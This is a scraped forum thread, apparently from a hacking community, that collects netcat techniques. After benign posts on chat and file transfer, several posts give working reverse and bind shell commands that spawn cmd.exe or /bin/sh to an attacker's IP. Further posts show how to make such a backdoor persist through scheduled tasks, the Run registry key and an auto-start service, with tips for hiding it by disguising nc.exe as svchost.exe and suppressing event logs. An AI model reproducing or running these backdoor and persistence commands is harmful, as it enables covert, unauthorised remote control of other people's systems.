Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: NetCat - The Swiss Army Knife Share/Save - My123World.Com!

  1. #1
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1

    NetCat - The Swiss Army Knife

    < Originally Posted by b0nd >

    It is said that this small tool has as many different usage as many the user of it can think of.
    It was developed in late 90's and is not supported by it's author. Anyways, it has great features and advanced clone of it has been developed by people. E.g. cryptcat, sbd, ncat (comes with NMap) etc.

    Let's put all the info which we have about the usage of netcat in this thread and give this tool the respect which it deserves.

  2. #2
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    NetCat - as chat application
    To use net cat as chat application among two systems, following could be done:


    Run the following at Server side:
    # nc -v -l -p <port_no>
    e.g # nc -v -l -p 8080


    -v : Verbose
    -l : It's small 'L'. It stands for "Listen mode". That is, nc is being asked to listen on a port specified after the parameter '-p'
    -p : Port number to listen on

    So by this time one -color: rgb(255, 255, 102);">netcat has started listening on one server on port 8080 and awaiting someone to connect to it.


    Run the following at Client side:
    # nc -v <IP-of-Server> <port_no>
    e.g. # nc -v 192.168.1.5 8080


    IP: IP of the machine which has -color: rgb(255, 255, 102);">netcat in listening mode
    Port: Port at which the remote machine is awaiting for connection

    After the connection has been established, you would be able to send the chat data on the network among two machines.

    Drawbacks:
    1. Text is sent as un-encrypted data, hence could be sniffed
    2. Chatting is not very appealing .
    3. Server should have public IP to listen on, or need to do port forwarding at Gateway of NATed network.

    SBD tool is much better for chat. Encrypted transfer and "chat-ids" can be specified using it.

  3. #3
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    Netcat Cheat Sheet ( Contributed by eberly)

    http://www.sans.org/security-resourc...t_sheet_v1.pdf

  4. #4
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    Transfering Files using Netcat
    Pulling file from Server
    • Server: # nc –v –l –p 8080 < some_file_at_server
    • Client: # nc -v [IP-of-Server] 8080 > some_file_at_client
    • When connection is established to server, the file from server will get transferred to client side and would be named as some_file_at_client.

    Pushing to Server
    • Server: # nc –v –l –p 8080 > some_file_at_server
    • Client: # nc -v [IP-of-Server] 8080 < some_file_at_client
    • When connection is established to server, the file from Client will get transferred to Server and would be named as some_file_at_server.


    Any file can be transferred, be it text or rar or html etc.
    Applicable for both, Linux and windows version of Netcat.

    Drawback:
    1. Traffic is not encrypted
    2. No way of knowing whether transfer has been completed . It won't display any message, it won't breaks the connection. Based on the size of file and monitoring the traffic it can be determined whether file has been transferred or not.

  5. #5
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    NetCat as backdoor
    Direct binding

    • Run NC as a daemon waiting for incoming connection

    # nc -d -L -p 8080 -e cmd.exe

    • -d: detach from console, make it as background process
    • -L: listen harder i.e. if connection is disconnected, it will again start listening. This feature was available for windows version only, but with some newer versions for linux this is available as well.
    • -e : Inbound program to execute


    In case of linux: instead of cmd.exe, run /bin/bash or /bin/sh etc.

    __________________________________________________ _________

    Reverse binding
    • # nc -d <our IP> <our port> -e cmd.exe
    • # nc -d <our IP> <our port> -e %SystemRoot%\System32\cmd.exe
    • # nc -d <our IP> <our port> -e %COMSPEC%

    • The drawback with this connection method is, we have to wait until and event (Task Scheduler) or user-driven action (logs on to the system or reboots the computer) triggers our backdoor commands to connect to the NC listener on our attack system. Bottom line is, that netcat has to be triggered on remote machine.

  6. #6
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    Triggering netcat as back door
    Couple of ways to trigger netcat as a back door:

    _____________________

    1. Executing the back door using Windows Task Scheduler
    >> Check whether Task Scheduler is "enabled"
    c:\ at

    >> Enabling the Task Scheduler if "disabled"
    c:\ net start schedule

    >> Adding the schedule for net cat (back door)
    c:\ at 15:00:00 /every:m,t,w,th,f,s,su ""c:\<path>\nc.exe -d <IP for reverse connect> <port_no> -e cmd.exe""

    >> Check the scheduler again to verify new job has been added properly, in case of mistake, delete the job and make a new one.
    c:\ at [id-of-your-job] /delete

    Note: To be more stealthy, rename nc.exe to some windows process and also make a copy of cmd.exe. e.g. rename nc.exe to svchost.exe and cmd.exe to explorer.exe. But make sure you don't mess up the original window files. Just make copy of them and keep in separate folder.

  7. #7
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    2. Executing the back door using a Registry Entry

    The back door would be triggered when the user logs on to the system.
    Add the registry key like following from command prompt:

    c:\ reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v -color: rgb(255, 255, 102);">netcat /t REG_SZ /d "c:\<path>\nc.exe -d <IP_for_reverse_connect> <remote_port> -e cmd.exe"

    As stated, the back door would be executed when some one logs into the system and you would leverage his "privilege", i.e. you could have a normal user privilege or of a administrator depending on the privilege of user logging in.

    Drawback: If shell has been lost, have to wait for the user to log-off and log-in again to trigger the back door connection.

  8. #8
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    3. Executing backdoor using Window Service

    >> Creating the new service (our backdoor) using Windows SC tool
    c:\ sc create -color: rgb(255, 255, 102);">netcat-backdoor binPATH= "cmd /K start c:\[path]\nc.exe -d [IP-for-reverse-connect] [remote-port] -e cmd.exe" start= auto error= ignore

    *Service name would be "-color: rgb(255, 255, 102);">netcat-backdoor". So better choose some stealthy name.
    start= auto: Would start back door automatically on Boot
    error= ignore: Don't send errors to the system event logs

    >> Start the service
    c:\net start [service-name]

    -color: rgb(255, 255, 102);">Netcat not meant to be run as service will throw error at this stage but will shovel a shell. With every reboot a shell would be smiling at you

    Drawback: If shell is lost, will have to wait for server to be rebooted (which could be a couple of months as well)


    --> Obviously the mentioned techniques are generic ones and can be used for any backdoor.

  9. #9

    Port forwarding using NetCat

    Port Forwarding or Port Mapping
    On Linux, NetCat can be used for port forwarding. Below are nine different ways to do port forwarding in NetCat:
    nc -l -p port1 -c ' nc -l -p port2'
    nc -l -p port1 -c ' nc host2 port2'
    nc -l -p port1 -c ' nc -u -l -p port2'
    nc -l -p port1 -c ' nc -u host2 port2'
    nc host1 port1 -c ' nc host2 port2'
    nc host1 port1 -c ' nc -u -l -p port2'
    nc host1 port1 -c ' nc -u host2 port2'
    nc -u -l -p port1 -c ' nc -u -l -p port2'
    nc -u -l -p port1 -c ' nc -u host2 port2'

    ---------------------------------------------------------------------------------

  10. #10
    tfs................................

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •